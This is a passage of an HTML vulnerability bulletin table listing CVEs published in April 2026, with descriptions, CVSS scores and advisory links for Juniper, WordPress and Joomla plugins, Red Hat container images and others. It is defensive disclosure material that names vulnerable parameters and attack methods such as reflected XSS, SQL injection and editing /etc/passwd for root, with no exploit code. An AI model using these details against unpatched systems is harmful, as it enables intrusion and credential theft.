    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33790" target="_blank" rel="noopener">CVE-2026-33790</a></td>
    <td><a href="https://kb.juniper.net/JSA107874" target="_blank" rel="noopener">https://kb.juniper.net/JSA107874</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>An Execution with Unnecessary Privileges vulnerability in the User Interface (UI) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged attacker to gain root privileges, thus compromising the system. When a configuration that allows unsigned Python op scripts is present on the device, a non-root user is able to execute malicious op scripts as a root-equivalent user, leading to privilege escalation. This issue affects Junos OS: * All versions before 22.4R3-S7, * from 23.2 before 23.2R2-S4, * from 23.4 before 23.4R2-S6, * from 24.2 before 24.2R1-S2, 24.2R2, * from 24.4 before 24.4R1-S2, 24.4R2; Junos OS Evolved: * All versions before 22.4R3-S7-EVO, * from 23.2 before 23.2R2-S4-EVO, * from 23.4 before 23.4R2-S6-EVO, * from 24.2 before 24.2R2-EVO, * from 24.4 before 24.4R1-S1-EVO, 24.4R2-EVO.</td>
    <td>2026-04-09</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33793" target="_blank" rel="noopener">CVE-2026-33793</a></td>
    <td><a href="https://kb.juniper.net/JSA103142" target="_blank" rel="noopener">https://kb.juniper.net/JSA103142</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>An Improper Input Validation vulnerability in Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker, sending a specific genuine BGP packet in an already established BGP session, to reset only that session, causing a Denial of Service (DoS). An attacker repeatedly sending the packet will sustain the Denial of Service (DoS). This issue affects Junos OS: * 25.2 versions before 25.2R2. This issue does not affect Junos OS versions before 25.2R1. This issue affects Junos OS Evolved: * 25.2-EVO versions before 25.2R2-EVO. This issue does not affect Junos OS Evolved versions before 25.2R1-EVO. eBGP and iBGP are affected. IPv4 and IPv6 are affected.</td>
    <td>2026-04-09</td>
    <td>7.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33797" target="_blank" rel="noopener">CVE-2026-33797</a></td>
    <td><a href="https://kb.juniper.net/JSA107850" target="_blank" rel="noopener">https://kb.juniper.net/JSA107850</a></td>
    </tr>

    <tr>
    <td class="vendor-product">shamimmoeen--WCAPF Ajax Product Filter for WooCommerce</td>
    <td>WCAPF - WooCommerce Ajax Product Filter plugin is vulnerable to time-based SQL Injection via the 'post-author' parameter in all versions up to, and including, 4.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</td>
    <td>2026-04-08</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3396" target="_blank" rel="noopener">CVE-2026-3396</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee0a762e-9159-4dab-a7be-9cbe332effb1?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/ee0a762e-9159-4dab-a7be-9cbe332effb1?source=cve</a><br><a href="https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L739" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L739</a><br><a href="https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L689" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L689</a><br><a href="https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L81" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L81</a><br><a href="https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L65" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L65</a><br><a href="https://plugins.trac.wordpress.org/changeset/3484080/" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3484080/</a></td>
    </tr>

    <tr>
    <td class="vendor-product">@fedify--fedify</td>
    <td>Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to 1.9.6, 1.10.5, 2.0.8, and 2.1.1, @fedify/fedify follows HTTP redirects recursively in its remote document loader and authenticated document loader without enforcing a maximum redirect count or visited-URL loop detection. An attacker who controls a remote ActivityPub key or actor URL can force a server using Fedify to make repeated outbound requests from a single inbound request, leading to resource consumption and denial of service. This vulnerability is fixed in 1.9.6, 1.10.5, 2.0.8, and 2.1.1.</td>
    <td>2026-04-06</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34148" target="_blank" rel="noopener">CVE-2026-34148</a></td>
    <td><a href="https://github.com/fedify-dev/fedify/security/advisories/GHSA-gm9m-gwc4-hwgp" target="_blank" rel="noopener">https://github.com/fedify-dev/fedify/security/advisories/GHSA-gm9m-gwc4-hwgp</a><br><a href="https://github.com/fedify-dev/fedify/releases/tag/1.10.5" target="_blank" rel="noopener">https://github.com/fedify-dev/fedify/releases/tag/1.10.5</a><br><a href="https://github.com/fedify-dev/fedify/releases/tag/1.9.6" target="_blank" rel="noopener">https://github.com/fedify-dev/fedify/releases/tag/1.9.6</a><br><a href="https://github.com/fedify-dev/fedify/releases/tag/2.0.8" target="_blank" rel="noopener">https://github.com/fedify-dev/fedify/releases/tag/2.0.8</a><br><a href="https://github.com/fedify-dev/fedify/releases/tag/2.1.1" target="_blank" rel="noopener">https://github.com/fedify-dev/fedify/releases/tag/2.1.1</a></td>
    </tr>

    <tr>
    <td class="vendor-product">AcademySoftwareFoundation--openexr</td>
    <td>OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, a misaligned memory write vulnerability exists in LossyDctDecoder_execute() in src/lib/OpenEXRCore/internal_dwa_decoder.h:749. When decoding a DWA or DWAB-compressed EXR file containing a FLOAT-type channel, the decoder performs an in-place HALF→FLOAT conversion by casting an unaligned uint8_t * row pointer to float * and writing through it. Because the row buffer may not be 4-byte aligned, this constitutes undefined behavior under the C standard and crashes immediately on architectures that enforce alignment (ARM, RISC-V, etc.). On x86 it is silently tolerated at runtime but remains exploitable via compiler optimizations that assume aligned access. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9.</td>
    <td>2026-04-06</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34379" target="_blank" rel="noopener">CVE-2026-34379</a></td>
    <td><a href="https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-w88v-vqhq-5p24" target="_blank" rel="noopener">https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-w88v-vqhq-5p24</a><br><a href="https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7" target="_blank" rel="noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7</a><br><a href="https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9" target="_blank" rel="noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9</a><br><a href="https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9" target="_blank" rel="noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9</a></td>
    </tr>

    <tr>
    <td class="vendor-product">aces--Loris</td>
    <td>LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 20.0.0 to before 27.0.3 and 28.0.1, a bug in the static file router can allow an attacker to traverse outside of the intended directory, allowing unintended files to be downloaded through the static, css, and js endpoints. This vulnerability is fixed in 27.0.3 and 28.0.1.</td>
    <td>2026-04-08</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34392" target="_blank" rel="noopener">CVE-2026-34392</a></td>
    <td><a href="https://github.com/aces/Loris/security/advisories/GHSA-rfj5-58hv-wc5f" target="_blank" rel="noopener">https://github.com/aces/Loris/security/advisories/GHSA-rfj5-58hv-wc5f</a></td>
    </tr>

    <tr>
    <td class="vendor-product">go-vikunja--vikunja</td>
    <td>Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the OIDC callback handler issues a full JWT token without checking whether the matched user has TOTP two-factor authentication enabled. When a local user with TOTP enrolled is matched via the OIDC email fallback mechanism, the second factor is completely skipped. This vulnerability is fixed in 2.3.0.</td>
    <td>2026-04-10</td>
    <td>7.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34727" target="_blank" rel="noopener">CVE-2026-34727</a></td>
    <td><a href="https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8jvc-mcx6-r4cg" target="_blank" rel="noopener">https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8jvc-mcx6-r4cg</a></td>
    </tr>

    <tr>
    <td class="vendor-product">HDFGroup--hdf5</td>
    <td>HDF5 is software for managing data. In 1.14.1-2 and earlier, a heap-use-after-free was found in the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger a heap use-after-free. The freed object is referenced in a memmove call from H5T__conv_struct. The original object was allocated by H5D__typeinfo_init_phase3 and freed by H5D__typeinfo_term.</td>
    <td>2026-04-09</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34734" target="_blank" rel="noopener">CVE-2026-34734</a></td>
    <td><a href="https://github.com/HDFGroup/hdf5/security/advisories/GHSA-w7v2-9cmr-pwwj" target="_blank" rel="noopener">https://github.com/HDFGroup/hdf5/security/advisories/GHSA-w7v2-9cmr-pwwj</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Analytify--Under Construction, Coming Soon &amp; Maintenance Mode</td>
    <td>Cross-Site Request Forgery (CSRF) vulnerability in Analytify Under Construction, Coming Soon &amp; Maintenance Mode allows Cross Site Request Forgery. This issue affects Under Construction, Coming Soon &amp; Maintenance Mode: from n/a through 2.1.1.</td>
    <td>2026-04-07</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34896" target="_blank" rel="noopener">CVE-2026-34896</a></td>
    <td><a href="https://patchstack.com/database/wordpress/plugin/under-construction-maintenance-mode/vulnerability/wordpress-under-construction-coming-soon-maintenance-mode-plugin-2-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank" rel="noopener">https://patchstack.com/database/wordpress/plugin/under-construction-maintenance-mode/vulnerability/wordpress-under-construction-coming-soon-maintenance-mode-plugin-2-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Analytify--Simple Social Media Share Buttons</td>
    <td>Cross-Site Request Forgery (CSRF) vulnerability in Analytify Simple Social Media Share Buttons allows Cross Site Request Forgery. This issue affects Simple Social Media Share Buttons: from n/a through 6.2.0.</td>
    <td>2026-04-07</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34904" target="_blank" rel="noopener">CVE-2026-34904</a></td>
    <td><a href="https://patchstack.com/database/wordpress/plugin/simple-social-buttons/vulnerability/wordpress-simple-social-media-share-buttons-plugin-6-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank" rel="noopener">https://patchstack.com/database/wordpress/plugin/simple-social-buttons/vulnerability/wordpress-simple-social-media-share-buttons-plugin-6-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve</a></td>
    </tr>
    </tbody>
    </table>
    <p><a href="#top">Back to top</a></p>
    </div>
    <div id="medium_v">
    <h2 id="medium_v_title">Medium Vulnerabilities</h2>
    <table class="table no-tablesaw" style="table-layout: fixed; width: 100%;" border="1" summary="Medium Vulnerabilities" align="center">
    <thead>
    <tr>
    <th class="vendor-product" style="width: 24%;" scope="col">
    <span class="primary-vendor">Primary</span><br><span class="primary-vendor">Vendor</span> -- Product</th>
    <th style="width: 44%;" scope="col">Description</th>
    <th style="width: 10%;" scope="col">Published</th>
    <th style="width: 8%;" scope="col">CVSS Score</th>
    <th style="width: 7%;" scope="col">Source Info</th>
    <th style="width: 7%;" scope="col">Patch Info</th>
    </tr>
    </thead>
    <tbody>

    <tr>
    <td class="vendor-product">Dynalon--MDwiki</td>
    <td>MDwiki contains a cross-site scripting vulnerability that allows remote attackers to execute arbitrary JavaScript by injecting malicious code through the location hash parameter. Attackers can craft URLs with JavaScript payloads in the hash fragment that are parsed and rendered without sanitization, causing the injected scripts to execute in the victim's browser context.</td>
    <td>2026-04-12</td>
    <td>6.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2017-20239" target="_blank" rel="noopener">CVE-2017-20239</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46097" target="_blank" rel="noopener">ExploitDB-46097</a><br><a href="https://www.vulncheck.com/advisories/mdwiki-cross-site-scripting-via-location-hash-parameter" target="_blank" rel="noopener">VulnCheck Advisory: MDwiki Cross-Site Scripting via Location Hash Parameter</a></td>
    </tr>

    <tr>
    <td class="vendor-product">NSauditor--SpotFTP Password Recover</td>
    <td>SpotFTP Password Recover 2.4.2 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an oversized buffer in the Name field during registration. Attackers can generate a 256-byte payload, paste it into the Name input field, and trigger a crash when submitting the registration code.</td>
    <td>2026-04-12</td>
    <td>6.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25711" target="_blank" rel="noopener">CVE-2019-25711</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46088" target="_blank" rel="noopener">ExploitDB-46088</a><br><a href="https://www.vulncheck.com/advisories/spotftp-password-recover-denial-of-service-via-name-field" target="_blank" rel="noopener">VulnCheck Advisory: SpotFTP Password Recover 2.4.2 Denial of Service via Name Field</a></td>
    </tr>

    <tr>
    <td class="vendor-product">NSauditor--BlueAuditor</td>
    <td>BlueAuditor 1.7.2.0 contains a buffer overflow vulnerability in the registration key field that allows local attackers to crash the application by submitting an oversized key value. Attackers can trigger a denial of service by entering a 256-byte buffer of repeated characters in the Key registration field, causing the application to crash during registration processing.</td>
    <td>2026-04-12</td>
    <td>6.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25712" target="_blank" rel="noopener">CVE-2019-25712</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46087" target="_blank" rel="noopener">ExploitDB-46087</a><br><a href="https://www.vulncheck.com/advisories/blueauditor-buffer-overflow-denial-of-service-via-registration-key" target="_blank" rel="noopener">VulnCheck Advisory: BlueAuditor 1.7.2.0 Buffer Overflow Denial of Service via Registration Key</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Synology--Synology SSL VPN Client</td>
    <td>A files or directories accessible to external parties vulnerability in Synology SSL VPN Client before 1.4.5-0684 allows remote attackers to access files within the installation directory via a local HTTP server bound to the loopback interface. By leveraging user interaction with a crafted web page, attackers may retrieve sensitive files such as configuration files, certificates, and logs, leading to information disclosure.</td>
    <td>2026-04-10</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2021-47960" target="_blank" rel="noopener">CVE-2021-47960</a></td>
    <td><a href="https://www.synology.com/en-global/security/advisory/Synology_SA_26_05" target="_blank" rel="noopener">Synology-SA-26:05 Synology SSL VPN Client</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Adivaha--WordPress adivaha Travel Plugin</td>
    <td>WordPress adivaha Travel Plugin 2.3 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the isMobile parameter. Attackers can craft malicious URLs containing JavaScript payloads in the isMobile GET parameter at the /mobile-app/v3/ endpoint to execute arbitrary code in victims' browsers and steal session tokens or credentials.</td>
    <td>2026-04-09</td>
    <td>6.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-54358" target="_blank" rel="noopener">CVE-2023-54358</a></td>
    <td><a href="https://www.exploit-db.com/exploits/51663" target="_blank" rel="noopener">ExploitDB-51663</a><br><a href="https://www.adivaha.com/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://wordpress.org/plugins/adiaha-hotel/" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/wordpress-adivaha-travel-plugin-reflected-xss-via-ismobile" target="_blank" rel="noopener">VulnCheck Advisory: WordPress adivaha Travel Plugin 2.3 Reflected XSS via isMobile</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Jlexart--Joomla JLex Review</td>
    <td>Joomla JLex Review 6.0.1 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the review_id URL parameter. Attackers can craft malicious links containing JavaScript payloads that execute in victims' browsers when clicked, enabling session hijacking or credential theft.</td>
    <td>2026-04-09</td>
    <td>6.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-54360" target="_blank" rel="noopener">CVE-2023-54360</a></td>
    <td><a href="https://www.exploit-db.com/exploits/51645" target="_blank" rel="noopener">ExploitDB-51645</a><br><a href="https://jlexart.com/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://extensions.joomla.org/extension/jlex-review/" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/joomla-jlex-review-reflected-xss-via-review-id-parameter" target="_blank" rel="noopener">VulnCheck Advisory: Joomla JLex Review 6.0.1 Reflected XSS via review_id Parameter</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Thethinkery--Joomla iProperty Real Estate</td>
    <td>Joomla iProperty Real Estate 4.1.1 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the filter_keyword parameter. Attackers can craft URLs containing JavaScript payloads in the filter_keyword GET parameter of the all-properties-with-map endpoint to execute arbitrary code in victim browsers and steal session tokens or credentials.</td>
    <td>2026-04-09</td>
    <td>6.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-54361" target="_blank" rel="noopener">CVE-2023-54361</a></td>
    <td><a href="https://www.exploit-db.com/exploits/51640" target="_blank" rel="noopener">ExploitDB-51640</a><br><a href="http://thethinkery.net" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/joomla-iproperty-real-estate-reflected-xss-via-filter-keyword" target="_blank" rel="noopener">VulnCheck Advisory: Joomla iProperty Real Estate 4.1.1 Reflected XSS via filter_keyword</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Virtuemart--Cart</td>
    <td>Joomla VirtueMart Shopping-Cart 4.0.12 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the keyword parameter. Attackers can craft malicious URLs containing script payloads in the keyword parameter of the product-variants endpoint to execute arbitrary JavaScript in victim browsers and steal session tokens or credentials.</td>
    <td>2026-04-09</td>
    <td>6.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-54362" target="_blank" rel="noopener">CVE-2023-54362</a></td>
    <td><a href="https://www.exploit-db.com/exploits/51631" target="_blank" rel="noopener">ExploitDB-51631</a><br><a href="https://www.virtuemart.net/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://demo.virtuemart.net/" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/joomla-virtuemart-shopping-cart-reflected-xss-via-keyword" target="_blank" rel="noopener">VulnCheck Advisory: Joomla VirtueMart Shopping-Cart 4.0.12 Reflected XSS via keyword</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Solidres--Joomla Solidres</td>
    <td>Joomla Solidres 2.13.3 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating multiple GET parameters including show, reviews, type_id, distance, facilities, categories, prices, location, and Itemid. Attackers can craft malicious URLs containing JavaScript payloads in these parameters to steal session tokens, login credentials, or manipulate site content when victims visit the crafted links.</td>
    <td>2026-04-09</td>
    <td>6.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-54363" target="_blank" rel="noopener">CVE-2023-54363</a></td>
    <td><a href="https://www.exploit-db.com/exploits/51638" target="_blank" rel="noopener">ExploitDB-51638</a><br><a href="http://solidres.com/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/joomla-solidres-reflected-xss-via-multiple-parameters" target="_blank" rel="noopener">VulnCheck Advisory: Joomla Solidres 2.13.3 Reflected XSS via Multiple Parameters</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Hikashop--Joomla HikaShop</td>
    <td>Joomla HikaShop 4.7.4 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating GET parameters in the product filter endpoint. Attackers can craft malicious URLs containing XSS payloads in the from_option, from_ctrl, from_task, or from_itemid parameters to steal session tokens or login credentials when victims visit the link.</td>
    <td>2026-04-09</td>
    <td>6.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-54364" target="_blank" rel="noopener">CVE-2023-54364</a></td>
    <td><a href="https://www.exploit-db.com/exploits/51629" target="_blank" rel="noopener">ExploitDB-51629</a><br><a href="https://www.hikashop.com/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://demo.hikashop.com/index.php/en/" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/joomla-hikashop-reflected-xss-via-product-filter" target="_blank" rel="noopener">VulnCheck Advisory: Joomla HikaShop 4.7.4 Reflected XSS via Product Filter</a></td>
    </tr>

    <tr>
    <td class="vendor-product">IBM--Concert</td>
    <td>IBM Concert 1.0.0 through 2.2.0 creates temporary files with predictable names, which allows local users to overwrite arbitrary files via a symlink attack.</td>
    <td>2026-04-07</td>
    <td>6.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-13044" target="_blank" rel="noopener">CVE-2025-13044</a></td>
    <td><a href="https://www.ibm.com/support/pages/node/7268620" target="_blank" rel="noopener">https://www.ibm.com/support/pages/node/7268620</a></td>
    </tr>

    <tr>
    <td class="vendor-product">elemntor--Elementor Website Builder more than just a page builder</td>
    <td>The Elementor Website Builder - More Than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widget parameters in all versions up to, and including, 3.35.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
    <td>2026-04-08</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-14732" target="_blank" rel="noopener">CVE-2025-14732</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/20232d70-72b2-47b7-ac7e-ad07892864ef?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/20232d70-72b2-47b7-ac7e-ad07892864ef?source=cve</a><br><a href="https://plugins.trac.wordpress.org/browser/elementor/trunk/modules/wp-rest/classes/elementor-post-meta.php#L67" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/elementor/trunk/modules/wp-rest/classes/elementor-post-meta.php#L67</a><br><a href="https://plugins.trac.wordpress.org/changeset?old_path=/elementor/tags/3.35.5&new_path=/elementor/tags/3.35.6" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset?old_path=/elementor/tags/3.35.5&new_path=/elementor/tags/3.35.6</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>A Missing Authentication for Critical Function vulnerability in command processing of Juniper Networks Junos OS allows a privileged local attacker to gain access to line cards running Junos OS Evolved as root. This issue affects systems running Junos OS using Linux-based line cards. Affected line cards include: * MPC7, MPC8, MPC9, MPC10, MPC11 * LC2101, LC2103 * LC480, LC4800, LC9600 * MX304 (built-in FPC) * MX-SPC3 * SRX5K-SPC3 * EX9200-40XS * FPC3-PTX-U2, FPC3-PTX-U3 * FPC3-SFF-PTX * LC1101, LC1102, LC1104, LC1105. This issue affects Junos OS: * all versions before 22.4R3-S8, * from 23.2 before 23.2R2-S6, * from 23.4 before 23.4R2-S6, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2, * from 25.2 before 25.2R2.</td>
    <td>2026-04-08</td>
    <td>6.7</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-30650" target="_blank" rel="noopener">CVE-2025-30650</a></td>
    <td><a href="https://github.com/orangecertcc/security-research/security/advisories/GHSA-fwhc-gh5m-v8fq" target="_blank" rel="noopener">https://github.com/orangecertcc/security-research/security/advisories/GHSA-fwhc-gh5m-v8fq</a><br><a href="https://kb.juniper.net/JSA107863" target="_blank" rel="noopener">https://kb.juniper.net/JSA107863</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Memory Corruption when accessing freed memory due to concurrent fence deregistration and signal handling.</td>
    <td>2026-04-06</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-47374" target="_blank" rel="noopener">CVE-2025-47374</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Siklu--EtherHaul 8010</td>
    <td>Siklu EtherHaul 8010 siklu-uimage-nxp-enc-10_6_2-18707-ea552dc00b devices have a static root password.</td>
    <td>2026-04-08</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-57175" target="_blank" rel="noopener">CVE-2025-57175</a></td>
    <td><a href="https://semaja2.net/2025/04/30/siklu-eh-firmware-decryption/" target="_blank" rel="noopener">https://semaja2.net/2025/04/30/siklu-eh-firmware-decryption/</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Red Hat--Red Hat Ansible Automation Platform 2</td>
    <td>A container privilege escalation flaw was found in certain Ansible Automation Platform images. This issue arises from the /etc/passwd file being created with group-writable permissions during the build process. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This vulnerability allows an attacker to add a new user with any arbitrary UID, including UID 0, gaining full root privileges within the container.</td>
    <td>2026-04-08</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-57847" target="_blank" rel="noopener">CVE-2025-57847</a></td>
    <td><a href="https://access.redhat.com/security/cve/CVE-2025-57847" target="_blank" rel="noopener">https://access.redhat.com/security/cve/CVE-2025-57847</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2391092" target="_blank" rel="noopener">RHBZ#2391092</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Red Hat--Multicluster Engine for Kubernetes</td>
    <td>A container privilege escalation flaw was found in certain Multicluster Engine for Kubernetes images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.</td>
    <td>2026-04-08</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-57851" target="_blank" rel="noopener">CVE-2025-57851</a></td>
    <td><a href="https://access.redhat.com/security/cve/CVE-2025-57851" target="_blank" rel="noopener">https://access.redhat.com/security/cve/CVE-2025-57851</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2391104" target="_blank" rel="noopener">RHBZ#2391104</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Red Hat--Red Hat Web Terminal</td>
    <td>A container privilege escalation flaw was found in certain Web Terminal images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.</td>
    <td>2026-04-08</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-57853" target="_blank" rel="noopener">CVE-2025-57853</a></td>
    <td><a href="https://access.redhat.com/security/cve/CVE-2025-57853" target="_blank" rel="noopener">https://access.redhat.com/security/cve/CVE-2025-57853</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2391106" target="_blank" rel="noopener">RHBZ#2391106</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Red Hat--Red Hat OpenShift Update Service</td>
    <td>A container privilege escalation flaw was found in certain OpenShift Update Service (OSUS) images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, may be able to leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.</td>
    <td>2026-04-08</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-57854" target="_blank" rel="noopener">CVE-2025-57854</a></td>
    <td><a href="https://access.redhat.com/security/cve/CVE-2025-57854" target="_blank" rel="noopener">https://access.redhat.com/security/cve/CVE-2025-57854</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2391107" target="_blank" rel="noopener">RHBZ#2391107</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Red Hat--Red Hat Process Automation 7</td>
